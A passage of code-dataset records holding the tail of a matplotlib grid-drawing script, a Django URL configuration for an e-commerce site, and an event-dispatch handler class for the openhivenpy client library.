grid\nfor x in range(N + 1):\n ax.axhline(x, lw=2, color='k', zorder=5)\n ax.axvline(x, lw=2, color='k', zorder=5)\n# draw the boxes\nax.imshow(data, interpolation='none', cmap=my_cmap, extent=[0, N, 0, N], zorder=0)\n# turn off the axis labels\nax.axis('off')\n\nplt.show()","sub_path":"bressenham/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162734598","text":"\"\"\"ecomm URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n# from django.conf.urls import url,include\n\nurlpatterns = [\n path(r'admin/',admin.site.urls),\n path(r'cart/',include('cart.urls')),\n path(r'orders/', include('orders.urls')), \n path(r'coupons/',include('coupons.urls')),\n path(r'paypal/', include('paypal.standard.ipn.urls')),\n path(r'payment/', include('payment.urls')),\n path(r'account/', include('account.urls')),\n path(r'forum/',include('forum.urls')),\n path(r'hire/',include('hire.urls')),\n path(r'', include('efarm.urls')),\n path(r'cabook/',include('cabook.urls')),\n path(r'book/',include('book.urls')),\n path(r'search/', include('haystack.urls')),\n # path('', include('social.apps.django_app.urls', namespace='social')),\n\n \n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n","sub_path":"ecomm/ecomm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293422760","text":"import logging\nimport typing\nfrom functools import wraps\n\nfrom openhivenpy.utils import dispatch_func_if_exists\n\nlogger = logging.getLogger(__name__) \n\n\nclass EventHandler:\n \"\"\"\n Event 
Handler for the HivenClient Class. Functions will be called from the\n websocket class and if the user registered an event response with the\n decorator @HivenClient.event, it will be called and executed.\n \"\"\"\n def __init__(self, call_obj: object = None):\n self._call_obj = call_obj\n if self._call_obj is None:\n logger.debug(\"[EVENT-HANDLER] Passed object where the events should be called from is None!\")\n self._call_obj = self\n\n def event(self, func: typing.Coroutine = None):\n \"\"\"\n Decorator used for registering Client Events\n \n :param func: Function that should be wrapped. Only usable if the wrapper is used in the function syntax: 'event(func)'!\n \n \"\"\"\n def decorator(func_: typing.Coroutine):\n @wraps(func_)\n async def wrapper(*args, **kwargs): \n return await func_(*args, **kwargs)\n \n setattr(self, func_.__name__, wrapper) # Adding the function to the object\n\n logger.debug(f\"[EVENT-HANDLER] >> Event {func_.__name__} registered\")\n\n return func_ # func can still be used normally\n\n # TODO! 
Needs to raise Exception if not async using 'inspect.iscoroutinefunction(func):'\n if func is None:\n return decorator\n else:\n return decorator(func)\n\n async def dispatch_on_connection_start(self) -> None:\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_connection_start'\n )\n\n async def dispatch_on_init(self, time) -> None:\n param = [time]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_init',\n func_args=param\n )\n\n async def dispatch_on_ready(self) -> None:\n param = []\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_ready',\n func_args=param\n )\n\n async def dispatch_on_user_update(self, old, new) -> None:\n param = [old, new]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_user_update',\n func_args=param\n )\n\n async def dispatch_on_house_update(self, old, new) -> None:\n param = [old, new]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_update',\n func_args=param\n )\n\n async def dispatch_on_house_add(self, house) -> None:\n param = [house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_join',\n func_args=param\n )\n\n async def dispatch_on_house_remove(self, house) -> None:\n param = [house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_remove',\n func_args=param\n )\n\n async def dispatch_on_house_delete(self, house_id) -> None:\n param = [house_id]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_delete',\n func_args=param\n )\n\n async def dispatch_on_house_down_time(self, house_id) -> None:\n param = [house_id]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_downtime',\n func_args=param\n )\n\n async def dispatch_on_room_create(self, room) -> None:\n param = [room]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_room_create',\n func_args=param\n )\n\n async def 
dispatch_on_house_member_join(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_join',\n func_args=param\n )\n\n async def dispatch_on_house_member_enter(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_online',\n func_args=param\n )\n\n async def dispatch_on_house_member_leave(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_leave',\n func_args=param\n )\n\n async def dispatch_on_house_member_exit(self, member, house) -> None:\n param = [member, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_offline',\n func_args=param\n )\n\n async def dispatch_on_relationship_update(self, relationship) -> None:\n param = [relationship]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_relationship_update',\n func_args=param\n )\n\n async def dispatch_on_presence_update(self, presence, user) -> None:\n param = [presence, user]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_presence_update',\n func_args=param\n )\n\n async def dispatch_on_message_create(self, message) -> None:\n param = [message]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_message_create',\n func_args=param\n )\n\n async def dispatch_on_message_delete(self, message) -> None:\n param = [message]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_message_delete',\n func_args=param\n )\n \n async def dispatch_on_message_update(self, message) -> None:\n param = [message]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_message_update',\n func_args=param\n )\n\n async def dispatch_on_typing_start(self, typing) -> None:\n param = [typing]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n 
func_name='on_typing_start',\n func_args=param\n )\n\n async def dispatch_on_typing_end(self, typing) -> None:\n param = [typing]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_typing_end',\n func_args=param\n )\n\n async def dispatch_on_member_update(self, old, new, house) -> None:\n param = [old, new, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_member_update',\n func_args=param\n )\n\n async def dispatch_on_house_member_chunk(self, members: list, house, data: dict) -> None:\n param = [members, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_member_chunk',\n func_args=param\n )\n\n async def dispatch_on_batch_house_member_update(self, house, members, data: dict) -> None:\n param = [members, data, house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_batch_house_member_update',\n func_args=param\n )\n\n async def dispatch_on_house_entity_update(self, house) -> None:\n param = [house]\n await dispatch_func_if_exists(\n obj=self._call_obj,\n func_name='on_house_entity_update',\n func_args=param\n )\n","sub_path":"openhivenpy/events/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}